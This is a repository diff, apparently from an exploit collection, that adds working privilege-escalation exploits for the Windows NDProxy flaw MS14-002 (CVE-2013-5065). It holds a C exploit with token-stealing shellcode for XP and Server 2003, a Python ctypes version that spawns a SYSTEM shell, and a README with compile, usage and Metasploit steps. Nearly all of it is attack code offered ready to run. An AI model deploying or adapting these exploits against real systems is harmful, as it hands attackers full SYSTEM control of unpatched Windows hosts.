SecWiki
diff --git a/Diff for: ‎MS14-002/CVE-2013-5065.c
+216 b/Diff for: ‎MS14-002/CVE-2013-5065.c
+216
diff --git a/Diff for: ‎MS14-002/CVE-2013-5065.py
+80 b/Diff for: ‎MS14-002/CVE-2013-5065.py
+80
diff --git a/Diff for: ‎MS14-002/MS14-002.exe
71.6 KB b/Diff for: ‎MS14-002/MS14-002.exe
71.6 KB
diff --git a/Diff for: ‎MS14-002/README.md
+36 b/Diff for: ‎MS14-002/README.md
+36
diff --git a/Diff for: ‎MS14-002/win2003.png
25.3 KB b/Diff for: ‎MS14-002/win2003.png
25.3 KB
@@ -0,0 +1,216 @@
+/*
+################################################################
+# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
+# Date: 2015-08-03
+# Exploit Author: Tomislav Paskalev
+# Vulnerable Software:
+#   Windows XP SP3 x86
+#   Windows XP SP2 x86-64
+#   Windows 2003 SP2 x86
+#   Windows 2003 SP2 x86-64
+#   Windows 2003 SP2 IA-64
+# Supported vulnerable software:
+#   Windows XP SP3 x86
+#   Windows 2003 SP2 x86
+# Tested on:
+#   Windows XP SP3 x86 EN
+#   Windows 2003 SP2 x86 EN
+# CVE ID: 2013-5065
+################################################################
+# Vulnerability description:
+#   NDPROXY is a system-provided driver that interfaces WAN
+#   miniport drivers, call managers, and miniport call managers
+#   to the Telephony Application Programming Interfaces (TAPI)
+#   services.
+#   The vulnerability is caused when the NDProxy.sys kernel
+#   component fails to properly validate input.
+#   An attacker who successfully exploited this vulnerability
+#   could run arbitrary code in kernel mode (i.e. with SYSTEM
+#   privileges).
+################################################################
+# Exploit notes:
+#   Privileged shell execution:
+#     - the SYSTEM shell will spawn within the existing shell
+#       (i.e. exploit usable via a remote shell)
+#   Exploit compiling:
+#     - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe
+#   Exploit prerequisites:
+#     - low privilege access to the target (remote shell or RDP)
+#     - target not patched (KB2914368 not installed)
+#     - service "Routing and Remote Access" running on the target
+#       - "Power User" user group can start and stop services
+#         - > sc query remoteaccess
+#         - > sc start remoteaccess
+################################################################
+# Thanks to:
+#   Andy (C PoC - Win XP SP3)
+#   ryujin (Python PoC - Win XP SP3)
+################################################################
+# References:
+#   http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065
+#   https://technet.microsoft.com/en-us/library/security/ms14-002.aspx
+#   https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/
+#   https://www.exploit-db.com/exploits/30014/
+#   https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx
+#   https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx
+#   https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx
+#   https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx
+################################################################
+*/
+
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+
+
+typedef struct {
+    PVOID   Unknown1;
+    PVOID   Unknown2;
+    PVOID   Base;
+    ULONG   Size;
+    ULONG   Flags;
+    USHORT  Index;
+    USHORT  NameLength;
+    USHORT  LoadCount;
+    USHORT  PathLength;
+    CHAR    ImageName[256];
+} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
+
+
+typedef struct {
+    ULONG   Count;
+    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
+
+
+typedef enum _SYSTEM_INFORMATION_CLASS {
+    SystemModuleInformation = 11,
+    SystemHandleInformation = 16
+} SYSTEM_INFORMATION_CLASS;
+
+
+typedef DWORD NTSTATUS;
+NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,
+         PVOID SystemInformation,
+         ULONG SystemInformationLength,
+         PULONG ReturnLength);
+
+
+
+static VOID InitFirstPage (void)
+{
+    PVOID BaseAddress;
+    ULONG RegionSize;
+    NTSTATUS ReturnCode;
+    FARPROC NtAllocateVirtualMemory;
+
+    NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory");
+
+    fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory);
+    RegionSize = 0xf000;
+    BaseAddress = (PVOID) 0x00000001;
+    ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (),
+                                         &BaseAddress,
+	                                     0,
+                                         &RegionSize,
+                                         MEM_COMMIT | MEM_RESERVE,
+                                         PAGE_EXECUTE_READWRITE);
+    if (ReturnCode != 0)
+    {
+         fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n");
+         fprintf (stderr, "    Error code: %#X\n", ReturnCode);
+         fflush (stderr);
+         ExitProcess (1);
+    }
+    fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr);
+    FillMemory (BaseAddress, RegionSize, 0x41);
+    return;
+}
+
+
+
+int exploit (unsigned char *shellcode)
+{
+    DWORD writtenBytes;
+    int returnValue;
+
+    InitFirstPage ();
+
+    unsigned char *shellcodeBuffer;
+    shellcodeBuffer = (char *) malloc (400);
+    memset (shellcodeBuffer, (int) "xCC", 400);
+    memcpy (shellcodeBuffer, shellcode, 112);
+
+    returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes);
+    if (returnValue == 0)
+    {
+        printf ("[-] Attempt to map memory_write failed\n");
+        printf ("    Error code: %d\n", GetLastError ());
+        exit(1);
+    }
+    HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL);
+    if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE)
+    {
+        printf ("[-] Creating a device handle on NDProxy failed\n");
+        printf ("    Error code: %d\n", GetLastError());
+        exit (0);
+    }
+    DWORD inputBuffer [0x15] = {0};
+    DWORD returnedBytes = 0;
+    *(inputBuffer + 5) = 0x7030125;
+    *(inputBuffer + 7) = 0x34;
+    DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0);
+    CloseHandle (ndProxyDeviceHandle);
+    system ("cmd.exe /T:C0 /K cd c:\\windows\\system32");
+    return 0;
+}
+
+
+
+int main (int argc, char **argv)
+{
+    if (argc != 2)
+    {
+        printf ("[*] Usage: %s OS_TYPE\n", argv[0]);
+        printf ("           supported OS_TYPE:\n");
+        printf ("                  XP  - Windows XP SP3 x86\n");
+        printf ("                  2k3 - Windows 2003 SP2 x86\n");
+        printf ("[*] Note:  the service \"Routing and Remote Access\"\n");
+        printf ("           must be running on the target machine\n");
+        exit (0);
+    }
+    else
+    {
+        if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0))
+        {
+            unsigned char shellcodeXP[] =
+            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+            "\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
+            "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B"
+            "\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00"
+            "\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3";
+            exploit (shellcodeXP);
+        }
+        else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0))
+        {
+            unsigned char shellcode2k3[] =
+            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+            "\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
+            "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B"
+            "\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00"
+            "\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3";
+            exploit (shellcode2k3);
+        }
+        else
+        {
+            printf ("[-] Invalid argument\n");
+            printf ("    Argument used: %s\n", argv[1]);
+            exit(0);
+        }
+    }
+}
@@ -0,0 +1,80 @@
+# NDPROXY Local SYSTEM privilege escalation
+# http://www.offensive-security.com
+# Tested on Windows XP SP3
+# http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/
+
+
+# Original crash ... null pointer dereference
+# Access violation - code c0000005 (!!! second chance !!!)
+# 00000038 ??              ???
+
+from ctypes import *
+from ctypes.wintypes import *
+import os, sys
+
+kernel32 = windll.kernel32
+ntdll = windll.ntdll
+
+GENERIC_READ     = 0x80000000
+GENERIC_WRITE    = 0x40000000
+FILE_SHARE_READ  = 0x00000001
+FILE_SHARE_WRITE = 0x00000002
+NULL = 0x0
+OPEN_EXISTING = 0x3
+PROCESS_VM_WRITE            = 0x0020
+PROCESS_VM_READ             = 0x0010
+MEM_COMMIT                  = 0x00001000
+MEM_RESERVE                 = 0x00002000
+MEM_FREE                    = 0x00010000
+PAGE_EXECUTE_READWRITE      = 0x00000040
+PROCESS_ALL_ACCESS          = 2097151
+FORMAT_MESSAGE_FROM_SYSTEM  = 0x00001000
+baseadd = c_int(0x00000001)
+MEMRES = (0x1000 | 0x2000)
+MEM_DECOMMIT = 0x4000
+PAGEEXE = 0x00000040
+null_size = c_int(0x1000)
+STATUS_SUCCESS = 0
+
+def log(msg):
+    print msg
+
+def getLastError():
+    """[-] Format GetLastError"""
+    buf = create_string_buffer(2048)
+    if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,
+            kernel32.GetLastError(), 0,
+            buf, sizeof(buf), NULL):
+        log(buf.value)
+    else:
+        log("[-] Unknown Error")
+
+print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day"
+print "[*] Vulnerability found in the wild"
+print "[*] Coded by Offensive Security"       
+        
+tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24)
+InBuf = c_char_p(tmp)
+
+dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE)
+if dwStatus != STATUS_SUCCESS:
+    print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus
+    getLastError()
+written = c_ulong()
+sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3"
+sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh))
+alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written))
+if alloc == 0:
+    print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc
+    getLastError()
+
+dwRetBytes = DWORD(0)
+DEVICE_NAME   = "\\\\.\\NDProxy"
+hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None)
+if hdev == -1:
+	print "[-] Couldn't open the device... :("
+	sys.exit()
+kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0)
+kernel32.CloseHandle(hdev)
+print "[+] Spawning SYSTEM Shell..."
+os.system("start /d \"C:\\windows\\system32\" cmd.exe")
@@ -0,0 +1,36 @@
+# MS14-002 
+
+```
+This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003 SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used to access an array unsafely, and the value is used to perform a call, leading to a NULL pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to work the service "Routing and Remote Access" must be running on the target system.
+```
+- The exp was from [@ev-zzo](https://github.com/dev-zzo/exploits-nt-privesc/blob/master/MS14-002/MS14-002.c)  [@Tomislav Paskalev](https://www.exploit-db.com/exploits/37732/)  [@ryujin](https://www.exploit-db.com/exploits/30014/)
+
+Vulnerability reference:
+ * [MS14-002](https://technet.microsoft.com/library/security/ms14-002)
+ * [CVE-2013-5065](https://www.exploit-db.com/exploits/39446/)
+
+
+## Usage
+- c:\> MS14-002.exe XP
+- c:\> MS14-002.exe 2k3
+
+![win2003](win2003.png)
+
+## load the module within the msf
+*[msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms_ndproxy)
+
+```
+  msf > use exploit/windows/local/ms_ndproxy
+  msf exploit(ms_ndproxy) > show targets
+        ...targets...
+  msf exploit(ms_ndproxy) > set TARGET <target-id>
+  msf exploit(ms_ndproxy) > show options
+        ...show and set options...
+  msf exploit(ms_ndproxy) > exploit
+
+```
+## Links
+
+*[The Kernel is calling a zero(day) pointer – CVE-2013-5065 – Ring Ring](https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Kernel-is-calling-a-zero(day)-pointer-–-CVE-2013-5065-–-Ring-Ring/)
+*[CVE-2013-5065: NDProxy array indexing error unpatched vulnerability](https://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/)
+